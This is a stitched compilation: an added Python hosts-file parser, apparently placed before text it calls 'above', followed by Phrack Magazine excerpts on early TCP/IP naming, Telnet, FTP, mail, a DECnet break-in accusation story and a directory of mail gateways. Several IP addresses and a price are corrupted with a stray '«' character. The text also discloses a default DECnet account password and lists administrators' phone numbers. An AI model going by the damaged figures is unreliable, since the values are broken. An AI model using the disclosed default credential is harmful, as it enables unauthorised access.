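The dotted-decimal and hosttable rules described above, as an added example (not code from the article): a strict parser that turns dotted decimal into the 32-bit value, splits it into network and host numbers, and loads an /etc/hosts-style table while rejecting damaged, ambiguous or conflicting entries. The classful A/B/C split is an assumption taken from the addressing rules of the period (since replaced by CIDR), which the article does not spell out; the function names and the sample table are constructed for illustration.

```python
import re

# One decimal octet: ASCII digits only, no sign, no leading zero. Some
# resolvers read a leading zero as octal, so "026" can name two different hosts.
_OCTET = re.compile(r"(?:0|[1-9][0-9]{0,2})\Z")


def parse_dotted(addr):
    """Return the 32-bit integer for a dotted-decimal address or raise ValueError."""
    parts = addr.split(".")
    if len(parts) != 4:
        raise ValueError("expected four octets: %r" % addr)
    value = 0
    for part in parts:
        if not _OCTET.match(part) or int(part) > 255:
            raise ValueError("bad octet %r in %r" % (part, addr))
        value = (value << 8) | int(part)
    return value


def classful_split(value):
    """Split a 32-bit address into (class, network number, host number).

    Assumption: classful rules. The leading bits select how many octets
    belong to the network number, which is why one network can be "10"
    and another "128.242".
    """
    if value >> 31 == 0:        # leading bit 0: 8-bit network, 24-bit host
        return "A", str(value >> 24), value & 0xFFFFFF
    if value >> 30 == 0b10:     # leading bits 10: 16-bit network, 16-bit host
        return "B", "%d.%d" % (value >> 24, (value >> 16) & 0xFF), value & 0xFFFF
    if value >> 29 == 0b110:    # leading bits 110: 24-bit network, 8-bit host
        net = "%d.%d.%d" % (value >> 24, (value >> 16) & 0xFF, (value >> 8) & 0xFF)
        return "C", net, value & 0xFF
    raise ValueError("class D/E address has no network/host split")


def load_hosttable(text):
    """Parse /etc/hosts-style text into ({hostname: address}, [(line, reason)])."""
    table, rejected = {}, []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()      # drop comments and blank lines
        if not line:
            continue
        fields = line.split()
        try:
            value = parse_dotted(fields[0])
            if len(fields) < 2:
                raise ValueError("address without a hostname")
        except ValueError as exc:
            rejected.append((lineno, str(exc)))
            continue
        for name in fields[1:]:
            name = name.lower()                  # hostnames compare case-insensitively
            if table.get(name, value) != value:  # same name, different address
                rejected.append((lineno, "%s already maps to another address" % name))
                continue
            table[name] = value
    return table, rejected


# Constructed sample table. Names and addresses are modelled on hosts the page
# lists; the last three lines are deliberately bad entries.
SAMPLE_HOSTTABLE = """\
# address     hostname [aliases]
26.0.0.73     SRI-NIC.ARPA
128.206.1.1   UMCVMB.MISSOURI.EDU umcvmb
18.72.0.39    ATHENA.MIT.EDU
128\u00ab9.99.1    CUCARD.MED.COLUMBIA.EDU   # damaged address, must not resolve
026.0.0.73    SRI-NIC.ARPA              # leading zero, ambiguous
10.0.0.1      umcvmb                    # constructed alias conflict
"""

if __name__ == "__main__":
    hosts, bad = load_hosttable(SAMPLE_HOSTTABLE)
    for name, value in sorted(hosts.items()):
        print("%-22s 0x%08X %s" % (name, value, classful_split(value)))
    for lineno, reason in bad:
        print("line %d rejected: %s" % (lineno, reason))
```

Rejecting an entry outright, rather than guessing at it, keeps a damaged or ambiguous line from silently pointing a hostname at a different machine.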
Users of computers are generally given accounts to which all charges for computer use are billed. Even if computer time is free at an installation, accounts are used to distinguish between the users and enforce file protections. The generic term "username" will be used in this file to refer to the name by which the computer account is accessed. In the early days of the ARPAnet which was the first network to use the TCP/IP protocols, computer users were identified by their username, followed by a commercial "at" sign (@), followed by the hostname on which the account existed. Networks were not given names, per se, although the IP address specified a network number. For example, "knight@phrackvax" referred to user "knight" on host "phrackvax." This did not specify which network "phrackvax" was on, although that information could be obtained by examining the hosttable and the IP address for "phrackvax." (However, "phrackvax" is a fictitious hostname used for this presentation.) As time went on, every computer on the network had to have an entry in its hosttable for every other computer on the network. When several networks linked together to form the Internet, the problem of maintaining this central hosttable got out of hand. Therefore, the domain name scheme was introduced to split up the hosttable and make it smaller and easier to maintain. In the new domain name scheme, users are still identified by their usernames, but hosts are now identified by their hostname and any and all domains of which they are a part. For example, the address "KNIGHT@UMCVMB.MISSOURI.EDU" specifies username "KNIGHT" on host "UMCVMB". However, host "UMCVMB" is a part of the domain "MISSOURI" " which is in turn part of the domain "EDU". There are other domains in "EDU", although only one is named "MISSOURI". In the domain "MISSOURI", there is only one host named "UMCVMB". 
However, other domains in "EDU" could theoretically have hosts named "UMCVMB" (although I would say that this is rather unlikely in this example). Thus the combination of hostname and all its domains makes it unique. The method of translating such names into IP addresses is no longer as straightforward as looking up the hostname in a table. Several protocols and specialized network software called nameservers and resolvers implement the domain name scheme. Not all TCP/IP implementations support domain names because it is rather new. In those cases, the local hosttable provides the only way to translate hostnames to IP addresses. The system manager of that computer will have to put an entry into the hosttable for every host that users may want to connect to. In some cases, users may consult the nameserver themselves to find out the IP address for a given hostname and then use that IP address directly instead of a hostname. I have selected a few network hosts to demonstrate how a host system can be specified by both the hostname and host numerical address. Some of the nodes I have selected are also nodes on BITnet, perhaps even some of the others that I do not make a note of due to a lack of omniscient awareness about each and every single host system in the world :-)

Numerical       Hostname                    Location                            BITnet
18.72.0.39      ATHENA.MIT.EDU              Mass. Institute of Technology       MIT
26.0.0.73       SRI-NIC.ARPA                DDN Network Information Center      -
36.21.0.13      MACBETH.STANFORD.EDU        Stanford University                 ?
36.21.0.60      PORTIA.STANFORD.EDU         Stanford University                 ?
128.2.11.131    ANDREW.CMU.EDU              Carnegie Mellon Univ.               ANDREW
128.3.254.13    LBL.GOV                     Lawrence Berkeley Laboratories      LBL
128.6.4.7       RUTGERS.RUTGERS.EDU         Rutgers University                  ?
128«9.99.1      CUCARD.MED.COLUMBIA.EDU     Columbia University                 ?
128.102.18.3    AMES.ARC.NASA.GOV           Ames Research Center [NASA]         -
128.103.1.1     HARVARD.EDU                 Harvard University                  HARVARD
128.111.24.40   HUB.UCSB.EDU                Univ. of Santa Barbara              ?
128.115.14.1    LLL-WINKEN.LLNL.GOV         Lawrence Livermore Laboratories     -
128.143.2.7     UVAARPA.VIRGINIA.EDU        University of Virginia              ?
128.148.128.40  BROWNVM.BROWN.EDU           Brown University                    BROWN
128.163.1«      UKCC.UKY.EDU                University of Kentucky              UKCC
128.183.10.4    NSSDCA.GSFC.NASA.GOV        Goddard Space Flight Center [NASA]  -
128.186.4.18    RAI.CC.FSU.EDU              Florida State University            FSU
128.206.1.1     UMCVMB.MISSOURI.EDU         Univ. of Missouri-Columbia          UMCVMB
128.208.1.15    MAX.ACS.WASHINGTON.EDU      University of Washington            MAX
128.228.1.2     CUNYVM.CUNY.EDU             City University of New York         CUNYVM
129.10.1.6      NUHUB.ACS.NORTHEASTERN.EDU  Northeastern University             NUHUB
131.151.1.4     UMRVMA.UMR.EDU              University of Missouri Rolla        UMRVMA
192.9.9.1       SUN.COM                     Sun Microsystems, Inc.              -
192.33.18.30    VM1.NODAK.EDU               North Dakota State Univ.            NDSUVM1
192.33.18«0     PLAINS.NODAK.EDU            North Dakota State Univ.            NDSUVAX

Please Note: Not every system on BITnet has an IP address. Likewise, not every system that has an IP address is on BITnet. Also, while some locations like Stanford University may have nodes on BITnet and have hosts on the IP as well, this does not necessarily imply that the systems on BITnet and on IP (the EDU domain in this case) are the same systems.

Attempts to gain unauthorized access to systems on the Internet are not tolerated and are legally a federal offense. At some hosts, they take this very seriously, especially the government hosts such as NASA's Goddard Space Flight Center, where they do not mind telling you so at the main prompt when you connect to their system. However, some nodes are public access to an extent. The DDN Network Information Center can be used by anyone. The server and database there have proven to be an invaluable source of information when locating people, systems, and other information that is related to the Internet.

Telnet

Remote login refers to logging in to a remote computer from a terminal connected to a local computer.
Telnet is the standard protocol in the DOD Protocol Suite for accomplishing this. The "rlogin" program, provided with Berkeley UNIX systems and some other systems, also enables remote login. For purposes of discussion, the "local computer" is the computer to which your terminal is directly connected while the "remote computer" is the computer on the network to which you are communicating and to which your terminal is *NOT* directly connected. Since some computers use a different method of attaching terminals to computers, a better definition would be the following: The "local computer" is the computer that you are currently using and the "remote computer" is the computer on the network with which you are or will be communicating. Note that the terms "host" and "computer" are synonymous in the following discussion.

To use Telnet, simply enter the command:

TELNET

The prompt that Telnet gives is:

Telnet>

(However, you can specify where you want to Telnet to immediately and bypass the prompts and other delays by issuing the command: TELNET [location].)

There is help available by typing in ?. This prints a list of all the valid subcommands that Telnet provides with a one-line explanation.

Telnet> ?

To connect to another computer, use the open subcommand to open a connection to that computer. For example, to connect to the host "UMCVMB.MISSOURI.EDU", do "open umcvmb.missouri.edu". Telnet will resolve (i.e., translate) the hostname "umcvmb.missouri.edu" into an IP address and will send a packet to that host requesting login. If the remote host decides to let you attempt a login, it prompts you for your username and password. If the host does not respond, Telnet will "time out" (i.e., wait for a reasonable amount of time such as 20 seconds) and then terminate with a message such as "Host not responding." If your computer does not have an entry for a remote host in its hosttable and it cannot resolve the name, you can use the IP address explicitly in the telnet command.
For example, TELNET 26.0.0.73 (Note: This is the IP address for the DDN Network Information Center [SRI-NIC.ARPA]) If you are successful in logging in, your terminal is connected to the remote host. For all intents and purposes, your terminal is directly hard-wired to that host and you should be able to do anything on your remote terminal that you can do at any local terminal. There are a few exceptions to this rule, however. Telnet provides a network escape character, such as CONTROL-T. You can find out what the escape character is by entering the "status" subcommand: Telnet> status You can change the escape character by entering the "escape" subcommand: Telnet> escape When you type in the escape character, the Telnet prompt returns to your screen and you can enter subcommands. For example, to break the connection, which usually logs you off the remote host, enter the subcommand "quit": Telnet> quit Your Telnet connection usually breaks when you log off the remote host, so the "quit" subcommand is not usually used to log off. When you are logged in to a remote computer via Telnet, remember that there is a time delay between your local computer and the remote one. This often becomes apparent to users when scrolling a long file across the terminal screen and they wish to cancel the scrolling by typing CONTROL-C or something similar. After typing the special control character, the scrolling continues. The special control character takes a certain amount of time to reach the remote computer which is still scrolling information. Thus response from the remote computer will not likely be as quick as response from a local computer. Once you are remotely logged on, the computer you are logged on to effectively becomes your "local computer," even though your original "local computer" still considers you logged on. You can log on to a third computer which would then become your "local computer" and so on. 
As you log out of each session, your previous session becomes active again. File Transfer FTP is the program that allows files to be sent from one computer to another. "FTP" stands for "File Transfer Protocol". When you start using FTP, a communications channel with another computer on the network is opened. For example, to start using FTP and initiate a file transfer session with a computer on the network called "UMCVMB", you would issue the following subcommand: FTP UMCVMB.MISSOURI.EDU Host "UMCVMB" will prompt you for an account name and password. If your login is correct, FTP will tell you so, otherwise it will say "login incorrect." Try again or abort the FTP program. (This is usually done by typing a special control character such as CONTROL-C. The "program abort" character varies from system to system.) Next you will see the FTP prompt, which is: Ftp> There are a number of subcommands of FTP. The subcommand "?" will list these commands and a brief description of each one. You can initiate a file transfer in either direction with FTP, either from the remote host or to the remote host. The "get" subcommand initiates a file transfer from the remote host (i.e. Tells the remote computer to send the file to the local computer [the one on which you issued the "ftp" command]). Simply enter "get" and FTP will prompt you for the remote host's file name and the (new) local host's file name. Example: Ftp> get Remote file name? theirfile local file name? myfile You can abbreviate this by typing both file names on the same line as the "get" subcommand. If you do not specify a local file name, the new local file will be called the same thing as the remote file. Valid FTP subcommands to get a file include the following: get theirfile myfile get doc.x25 The "put" subcommand works in a similar fashion and is used to send a file from the local computer to the remote computer. Enter the command "put" and FTP will prompt you for the local file name and then the remote file name. 
If the transfer cannot be done because the file doesn't exist or for some other reason, FTP will print an error message. There are a number of other subcommands in FTP that allow you to do many more things. Not all of these are standard so consult your local documentation or type a question mark at the FTP prompt. Some functions often built into FTP include the ability to look at files before getting or putting them, the ability to change directories, the ability to delete files on the remote computer, and the ability to list the directory on the remote host. An intriguing capability of many FTP implementations is "third party transfers." For example, if you are logged on computer A and you want to cause computer B to send a file to computer C, you can use FTP to connect to computer B and use the "rmtsend" command. Of course, you have to know usernames and passwords on all three computers, since FTP never allows you to peek into someone's directory and files unless you know their username and password. The "cd" subcommand changes your working directory on the remote host. The "lcd" subcommand changes the directory on the local host. For UNIX systems, the meaning of these subcommands is obvious. Other systems, especially those that do not have directory-structured file system, may not implement these commands or may implement them in a different manner. The "dir" and "ls" subcommands do the same thing, namely list the files in the working directory of the remote host. The "list" subcommand shows the contents of a file without actually putting it into a file on the local computer. This would be helpful if you just wanted to inspect a file. You could interrupt it before it reached the end of the file by typing CONTROL-C or some other special character. This is dependent on your FTP implementation. The "delete" command can delete files on the remote host. You can also make and remove directories on the remote host with "mkdir" and "rmdir". 
The "status" subcommand will tell you if you are connected and with whom and what the state of all your options is. If you are transferring binary files or files with any non-printable characters, turn binary mode on by entering the "binary" subcommand:

    binary

To resume non-binary transfers, enter the "ascii" subcommand. Transferring a number of files can be done easily by using "mput" (multiple put) and "mget" (multiple get). For example, to get every file in a particular directory, first issue a "cd" command to change to that directory and then a "mget" command with an asterisk to indicate every file:

    cd somedirectory
    mget *

When you are done, use the "close" subcommand to break the communications link. You will still be in FTP, so you must use the "bye" subcommand to exit FTP and return to the command level. The "quit" subcommand will close the connection and exit from FTP at the same time.

Mail

Mail is the simplest network facility to use in many ways. All you have to do is to create your message, which can be done with a file editor or on the spur of the moment, and then send it. Unlike FTP and Telnet, you do not need to know the password of the username on the remote computer. This is so because you cannot change or access the files of the remote user nor can you use their account to run programs. All you can do is to send a message. There is probably a program on your local computer which does mail between users on that computer. Such a program is called a mailer. This may or may not be the way to send or receive mail from other computers on the network, although integrated mailers are more and more common. UNIX mailers will be used as an example in this discussion. Note that the protocol which is used to send and receive mail over a TCP/IP network is called SMTP, the "Simple Mail Transfer Protocol." Typically, you will not use any program called SMTP, but rather your local mail program. UNIX mailers are usually used by invoking a program named "mail".
To receive new mail, simply type "mail". There are several varieties of UNIX mailers in existence. Consult your local documentation for details. For example, the command "man mail" prints out the manual pages for the mail program on your computer. To send mail, you usually specify the address of the recipient on the mail command. For example: "mail knight@umcvmb.missouri.edu" will send the following message to username "knight" on host "umcvmb". You can usually type in your message one line at a time, pressing RETURN after each line and typing CONTROL-D to end the message. Other facilities to include already-existing files sometimes exist. For example, Berkeley UNIX systems allow you to enter commands similar to the following to include a file in your current mail message:

    ~r myfile

In this example, the contents of "myfile" are inserted into the message at this point. Most UNIX systems allow you to send a file through the mail by using input redirection. For example:

    mail knight@umcvmb.missouri.edu < myfile

In this example, the contents of "myfile" are sent as a message to "knight" on "umcvmb." Note that in many UNIX systems the only distinction between mail bound for another user on the same computer and another user on a remote computer is simply the address specified. That is, there is no hostname for local recipients. Otherwise, mail functions in exactly the same way. This is common for integrated mail packages. The system knows whether to send the mail locally or through the network based on the address and the user is shielded from any other details.

"The Quest For Knowledge Is Without End..."

123.Phrack Magazine - Vol. 3, Issue 27 by Knight Lightning

Prologue For Non-VMS Users

DECnet is the network for DEC machines, in most cases you can say VAX's. DECnet allows you to do:

· e-mail
· file transfer
· remote login
· remote command
· remote job entry
· PHONE

PHONE is an interactive communication between users and is equal to TALK on UNIX or a "deluxe"-CHAT on VM/CMS.
BELWUE, the university network of the state Baden-Wuerttemberg in West Germany contains (besides other networks) a DECnet with about 400 VAX's. On every VAX there is standard-account called DECNET with pw:= DECNET, which is not reachable via remote login. This account is provided for several DECnet-Utilities and as a pseudo-guest-account. The DECNET-account has very restricted privileges: You cannot edit a file or make another remote login. The HELP is equipped by the system and is similar to the MAN command on UNIX. More information on DECnet can be found in "Looking Around In DECnet" by Deep Thought in this very issue of Phrack Inc. Here, at the University of Ulm, we have an *incredibly* ignorant computer center staff, with an even bigger lack of system-literature (besides the 80kg of VAX/VMS-manuals). The active may search for information by himself, which is over the level of "run," "FORTRAN," or "logout." My good luck that I have other accounts in the BELWUE-DECnet, where more information is offered for the users. I am a regular student in Ulm and all my accounts are completely legal and corresponding to the German laws. I don't call myself a "hacker," I feel more like a "user" (...it's more a defining-problem). In the HELP-menu in a host in Tuebingen I found the file netdcl.com and the corresponding explanation, which sends commands to the DECNET-Account of other VAX's and executes them there (remote command). The explanation in the HELP-menu was idiot-proof -- therefore for me, too :-) With the command "$ mcr ncp show known nodes" you can obtain a list of all netwide active VAX's, as is generally known, and so I pinged all these VAX's to look for more information for a knowledge-thirsty user. With "help", "dir" and other similar commands I look around on those DECnet accounts, always watching for topics related to the BELWUE-network. It's a pity, that 2/3 of all VAX's have locked the DECNET-Account for NETDCL.COM. 
Their system managers are probably afraid of unauthorized access, but I cannot imagine how there could be such an unauthorized access, because you cannot log on this account -- no chance for trojan horses, etc. Some system managers called me back after I visited their VAX to chat with me about the network and asked me if they could help me in any way. One sysop from Stuttgart even sent me a version of NETDCL.COM for the ULTRIX operation system. Then, after a month, the HORROR came over me in the shape of the following mail:

--- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- ---
From: TUEBINGEN::SYSTEM 31-MAY-1989 15:31:11.38
To: FRAMSTAG
CC:
Subj: don't make any crap, or you'll be kicked out!

From: ITTGPX::SYSTEM 29-MAY-1989 16:46
To: TUEBINGEN::SYSTEM
Subj: System-breaking-in 01-May-1989

To the system manager of the Computer TUEBINGEN,

On May 1st 1989 we had a System-breaking-in in our DECNET-account, which started from your machine. By help of our accounting we ascertained your user FRAMSTAG to have emulated an interactive log-on on our backbone-node and on every machine of our VAX-cluster with the "trojan horse" NETDCL.COM. Give us this user's name and address and clear up the occurrence completely. We point out that the user is punishable. In case of repetition we would be forced to take corresponding measures. We will check whether our system got injured. If not, this time we will disregard any measure. Inform us via DECnet about your investigation results -- we are attainable by the nodenumber 1084::system

Dipl.-Ing. Michael Hager
--- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- ---

My system manager threatened me with the deleting of my account, if I would not immediately enlighten the affair. *Gulp*! I was conscious about my innocence, but how to tell it to the others? I explained, step by step, everything to my system manager.
He then understood after a while, but the criminal procedure still hovered over me... so, I took quickly to my keyboard, to compose a file of explanations and to send it to that angry system manager in Stuttgart (node 1084 is an institute there). But no way out: He had run out of disk quota and my explanation-mail sailed into the nirvana:

--- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- ---
$ mail explanation
To: 1084::system
%MAIL-E, error sending to user SYSTEM at 1084
%MAIL-E-OPENOUT, error opening SYS$SYSROOT:[SYSMGR]MAIL$00040092594FD194.MAI; as output
-RMS-E-CRE, ACP file create failed
-SYSTEM-F-EXDISKQUOTA, disk quota exceeded
--- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- ---

Also the attempt of a connection with the PHONE-facility failed: In his borderless hacker-paranoia, he cut off his PHONE... and nowhere is a list with the REAL-addresses of the virtual DECnet-addresses available (to prevent hacking). Now I stood there with the brand "DANGEROUS HACKER!" and I had no chance to vindicate myself. I poured out my troubles to an acquaintance of mine, who is a sysop in the computer-center in Freiburg. He asked other sysops and managers thru the whole BELWUE-network until someone gave him a telephone number after a few days -- and that was the right one! I phoned to this Hager and told him what I had done with his DECnet-account and also what NOT. I wanted to know which crime I had committed. He promptly canceled all of his reproaches, but he did not excuse his defames incriminations. I entreated him to inform my system manager in Tuebingen that I have done nothing illegal and to stop him from erasing my account. This happens already to a fellow student of mine (in this case, Hager was also guilty). He promised me that he would officially cancel his reproaches. After over a week this doesn't happen (I'm allowed to use my account further on).
In return for it, I received a new mail from Hager on another account of mine:

--- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- ---
From: 1084::HAGER 1-JUN-1989 12:51
To: 50180::STUD_11
Subj: System-breaking-in

On June 1st 1989 you have committed a system-breaking-in on at least one of our VAX's. We were able to register this occurrence. We would be forced to take further measure if you did not clear up the occurrence completely until June 6th. Of course the expenses involved would be imposed on you. Hence enlightenment must be in your own interest. We are attainable via DECnet-mail with the address 1084::HAGER or via following address:

Institut fuer Technische Thermodynamik und Thermische Verfahrenstechnik
Dipl.-Ing. M. Hager Tel.: 0711/685-6109
Dipl.-Ing. M. Mrzyglod Tel.: 0711/685-3398
Pfaffenwaldring 9/10-1
7000 Stuttgart-80

M. Hager
M. Mrzyglod
--- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- ---

This was the reaction of my attempt: "$ PHONE 1084::SYSTEM". I have not answered to this mail. I AM SICK OF IT!

124. Phrack Magazine - Vol. 3, Issue 28 by Taran King

ACSNET

Australian Computer Science Network (ACSNET), also known as Oz, has its gateway through the CSNET node munnari.oz.au and if you cannot directly mail to the oz.au domain, try either username%munnari.oz.au@UUNET.UU.NET or munnari!username@UUNET.UU.NET.

AT&T MAIL

AT&T Mail is a mailing service of AT&T, probably what you might call its MCI-Mail equivalent. It is available on the UUCP network as node name attmail but I've had problems having mail get through. Apparently, it does cost money to mail to this service and the surrounding nodes are not willing to pick up the tab for the ingoing mail, or at least, this has seemingly been the case thus far. I believe, though, that perhaps routing to att!attmail!user would work.
AT&T recently announced six new X.400 interconnections between AT&T Mail and electronic mail services in the US, Korea, Sweden, Australia, and Finland. In the US, AT&T Mail is now interconnected with Telenet Communications Corporation's service, Telemail, allowing users of both services to exchange messages easily. With the addition of these interconnections, the AT&T Mail Gateway 400 Service allows AT&T Mail subscribers to exchange messages with users of the following electronic messaging systems:

    Company                 E-Mail Name   Country
    TeleDelta               TeDe 400      Sweden
    OTC                     MPS400        Australia
    Telecom-Canada          Envoy100      Canada
    DACOM                   DACOM MHS     Korea
    P&T-Tele                MailNet 400   Finland
    Helsinki Telephone Co.  ELISA         Finland
    Dialcom                 Dialcom       USA
    Telenet                 Telemail      USA
    KDD                     Messavia      Japan
    Transpac                ATLAS400      France

The interconnections are based on the X.400 standard, a set of guidelines for the format, delivery and receipt of electronic messages recommended by an international standards committee, the CCITT. International X.400 messages incur a surcharge. They are:

    To Canada:
        Per note: $.05
        Per message unit: $.10
    To other international locations:
        Per note: $.20
        Per message unit: $«0

There is no surcharge for X.400 messages within the US.

The following are contacts to speak with about mailing through these mentioned networks. Other questions can be directed through AT&T Mail's toll-free number, 1-800-624-5672.

    MHS Gateway: mhs!atlas
    Administrator: Bernard Tardieu
    Transpac
    Phone: 3399283203

    MHS Gateway: mhs!dacom
    Administrator: Bob Nicholson
    AT&T
    Morristown, NJ 07960
    Phone: +1 201 644 1838

    MHS Gateway: mhs!dialcom
    Administrator: Mr. Laraman
    Dialcom
    South Plainfield, NJ 07080
    Phone: +1 441 493 3843

    MHS Gateway: mhs!elisa
    Administrator: Ulla Karajalainen
    Nokia Data
    Phone: 01135804371

    MHS Gateway: mhs!envoy
    Administrator: Kin C. Ma
    Telecom Canada
    Phone: +1 613 567 7584

    MHS Gateway: mhs!kdd
    Administrator: Shigeo Lwase
    Kokusai Denshin Denwa CO.
    Phone: 8133477419

    MHS Gateway: mhs!mailnet
    Administrator: Kari Aakala
    Gen Directorate Of Post &
    Phone: 35806921730

    MHS Gateway: mhs!otc
    Administrator: Gary W. Krumbine
    AT&T Information Systems
    Lincroft, NJ 07738
    Phone: +1 201 576 2658

    MHS Gateway: mhs!telemail
    Administrator: Jim Kelsay
    GTE Telenet Comm Corp
    Reston, VA 22096
    Phone: +1 703 689 6034

    MHS Gateway: mhs
    Administrator: AT&T Mail MHS Gateway
    AT&T
    Lincroft, NJ 08838
    Phone: +1 800 624 5672

CMR

Previously known as Intermail, the Commercial Mail Relay (CMR) Service is a mail relay service between the Internet and three commercial electronic mail systems: US Sprint/Telenet, MCI-Mail, and DIALCOM systems (i.e. Compmail, NSFMAIL, and USDA-MAIL). An important note: The only requirement for using this mail gateway is that the work conducted must be DARPA sponsored research and other approved government business. Basically, this means that unless you've got some government-related business, you're not supposed to be using this gateway. Regardless, it would be very difficult for them to screen everything that goes through their gateway. Before I understood the requirements of this gateway, I was sending to a user of MCI-Mail and was not contacted about any problems with that communication. Unfortunately, I mistyped the MCI-Mail address on one of the letters and that letter ended up getting read by system administrators who then informed me that I was not to be using that system, as well as the fact that they would like to bill me for using it. That was an interesting thought on their part anyway, but do note that using this service does incur charges.

The CMR mailbox address in each system corresponds to the label:

    Telemail:  [Intermail/USCISI]TELEMAIL/USA
    MCI-Mail:  Intermail or 107-8239
    CompMail:  Intermail or CMP0817
    NSF-Mail:  Intermail or NSF153
    USDA-Mail: Intermail or AGS9999

Addressing examples for each e-mail system are as follows:

    MCIMAIL:   123-4567                   seven digit address
               Everett T. Bowens          person's name (must be unique!)
    COMPMAIL:  CMP0123                    three letters followed by three or four digits
               S.Cooper                   initial, then "." and then last name
               134:CMP0123                domain, then ":" and then combination system and account number
    NSFMAIL:   NSF0123                    three letters followed by three or four digits
               A.Phillips                 initial, then "." and then last name
               157:NSF0123                domain, then ":" and then combination system and account number
    USDAMAIL:  AGS0123                    three letters followed by three or four digits
               P.Shifter                  initial, then "." and then last name
               157:AGS0123                domain, then ":" and then combination system and account number
    TELEMAIL:  BARNOC                     user (directly on Telemail)
               BARNOC/LODH                user/organization (directly on Telemail)
               [BARNOC/LODH]TELEMAIL/USA  [user/organization]system branch/country

The following are other Telenet system branches/countries that can be mailed to:

    TELEMAIL/USA        NASAMAIL/USA   MAIL/USA       TELEMEMO/AUSTRALIA
    TELECOM/CANADA      TOMMAIL/CHILE  TMAILUK/GB     ITALMAIL/ITALY
    ATI/JAPAN           PIPMAIL/ROC    DGC/USA        FAAMAIL/USA
    GSFC/USA            GTEMAIL/USA    TM11/USA       TNET.TELEMAIL/USA
    USDA/USA

Note: OMNET's ScienceNet is on the Telenet system MAIL/USA and to mail to it, the format would be [A.MAILBOX/OMNET]MAIL/USA.
The following are available subdivisions of OMNET:

    AIR    Atmospheric Sciences
    EARTH  Solid Earth Sciences
    LIFE   Life Sciences
    OCEAN  Ocean Sciences
    POLAR  Interdisciplinary Polar Studies
    SPACE  Space Science and Remote Sensing

The following is a list of DIALCOM systems available in the listed countries with their domain and system numbers:

    Service Name     Country         Domain Number  System Number
    Keylink-Dialcom  Australia       60             07, 08, 09
    Dialcom          Canada          20             20, 21, 22, 23, 24
    DPT Databooks    Denmark         124            71
    Telebox          Finland         127            62
    Telebox          West Germany    30             15, 16
    Dialcom          Hong Kong       80             88, 89
    Eirmail          Ireland         100            74
    Goldnet          Israel          50             05, 06
    Mastermail       Italy           130            65, 67
    Mastermail       Italy           1              66, 68
    Dialcom          Japan           70             13, 14
    Dialcom          Korea           1              52
    Telecom Gold     Malta           100            75
    Dialcom          Mexico          1              52
    Memocom          Netherlands     124            27, 28, 29
    Memocom          Netherlands     1              55
    Starnet          New Zealand     64             01, 02
    Dialcom          Puerto Rico     58             25
    Telebox          Singapore       88             10, 11, 12
    Dialcom          Taiwan          1              52
    Telecom Gold     United Kingdom  100            01, 04, 17, 80-89
    DIALCOM          USA             1              29-34, 37, 38, 41-59, 61-63, 90-99

NOTE: You can also mail to username@NASAMAIL.NASA.GOV or username@GSFCMAIL.NASA.GOV instead of going through the CMR gateway to mail to NASAMAIL or GSFCMAIL. For more information and instructions on how to use CMR, send a message to the user support group at intermail-request@intermail.isi.edu (you'll get basically what I've listed plus maybe a bit more). Please read Chapter 3 of The Future Transcendent Saga (Limbo to Infinity) for specifics on mailing to these destination mailing systems.

COMPUSERVE

CompuServe is well known for its games and conferences. It does, though, have mailing capability. Now, they have developed their own Internet domain, called COMPUSERVE.COM. It is relatively new and mail can be routed through either TUT.CIS.OHIO-STATE.EDU or NORTHWESTERN.ARPA. (Example: user%COMPUSERVE.COM@TUT.CIS.OHIO-STATE.EDU or replace TUT.CIS.OHIO-STATE.EDU with NORTHWESTERN.ARPA).
The CompuServe link appears to be a polled UUCP connection at the gateway machine. It is actually managed via a set of shell scripts and a comm utility called xcomm, which operates via command scripts built on the fly by the shell scripts during analysis of what jobs exist to go into and out of CompuServe. CompuServe subscriber accounts of the form 7xxxx, yyyy can be addressed as 7xxxx.yyyy@compuserve.com. CompuServe employees can be addressed by their usernames in the csi.compuserve.com subdomain. CIS subscribers write mail to ">inet:user@host.domain" to mail to users on the Wide-Area Networks, where ">gateway:" is CompuServe's internal gateway access syntax. The gateway generates fully-RFC-compliant headers. To fully extrapolate -- from the CompuServe side, you would use their EasyPlex mail system to send mail to someone in BITNET or the Internet. For example, to send me mail at my Bitnet ID, you would address it to: INET:C488869%UMCVMB.BITNET@CUNYVM.CUNY.EDU Or to my Internet ID: INET:C488869@UMCVMB.MISSOURI.EDU Now, if you have a BITNET to Internet userid, this is a silly thing to do, since your connect time to CompuServe costs you money. However, you can use this information to let people on CompuServe contact YOU. CompuServe Customer Service says that there is no charge to either receive or send a message to the Internet or BITNET. DASNET DASnet is a smaller network that connects to the Wide-Area Networks but charges for their service. DASnet subscribers get charged for both mail to users on other networks AND mail for them from users of other networks. The following is a brief description of DASnet, some of which was taken from their promotional text letter. DASnet allows you to exchange electronic mail with people on more than 20 systems and networks that are interconnected with DASnet. One of the drawbacks, though, is that, after being subscribed to these services, you must then subscribe to DASnet, which is a separate cost. 
Members of Wide-Area networks can subscribe to DASnet too. Some of the networks and systems reachable through DASnet include the following: ABA/net, ATT Mail, BIX (Byte Information eXchange), DASnet Network, Dialcom, EIES, EasyLink, Envoy 100, FAX, GeoMail, INET, MCI Mail, NWI, PeaceNet/EcoNet, Portal Communications, The Meta Network, The Source, Telemail, ATI's Telemail (Japan), Telex, TWICS (Japan), UNISON, UUCP, The WELL, and Domains (i.e. ".COM" and ".EDU" etc.). New systems are added all of the time. As of the writing of this file, Connect, GoverNET, MacNET, and The American Institute of Physics PI-MAIL are soon to be connected.

You can get various accounts on DASnet including:

· Corporate Accounts -- If your organization wants more than one individual subscription.
· Site Subscriptions -- If you want DASnet to link directly to your organization's electronic mail system.

To send e-mail through DASnet, you send the message to the DASnet account on your home system. You receive e-mail at your mailbox, as you do now. On the Wide-Area Networks, you send mail to XB.DAS@STANFORD.BITNET. On the Subject: line, you type the DASnet address in brackets and then the username just outside of them. The real subject can be expressed after the username separated by a "!" (Example: Subject: [0756TK]randy!How's Phrack?).

